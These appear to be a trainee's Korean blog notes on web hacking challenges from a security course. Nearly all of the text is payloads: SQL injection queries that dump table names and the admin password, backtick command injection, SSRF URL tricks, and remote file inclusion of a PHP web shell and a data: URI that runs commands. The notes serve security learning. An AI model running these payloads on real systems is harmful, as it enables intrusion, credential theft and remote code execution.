https://bob.rubiya.kr/chall.php
order by 3
column은 3개
0 union select 1,2,3
0 union select 1,2,version()
information schema
0 union select 1,2, info from information_schema.processlist
table=> 0 union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=database()
0 union select 1,2, group_concat(column_name) from information_schema.columns where table_name='user'
0 union select id, pw, 1 from user where id='admin'
system("host {input}")
`head -2 index.php`
`grep FLAG index.php`
gitdumper
git log -p
ssrf=>pastebin
?http://a@pastebin.com:80@rubiya.kr/raw/~~~
http://asdf.kr#@rubiya.kr
ssrf bible
A new era of SSRF
data에 XXE 넣어주기
exif 변조 툴???
file inclusion3번
외부에서 파일 include가 가능하다
<?php
system($_GET['c']);
?>
http://a.rubiya.kr
/payload
?page=data:text/plain,<?php%20system(id)?>;
smarty
'비오비' 카테고리의 다른 글
| 8/4 [박세준 멘토님] (0) | 2019.08.04 |
|---|---|
| 8/3[이종호] (0) | 2019.08.03 |
| 8/1[신정훈멘토님] (0) | 2019.08.01 |
| 7/31 [이종호멘토님] (0) | 2019.07.31 |
| 7/30 [조상현 멘토님] (0) | 2019.07.30 |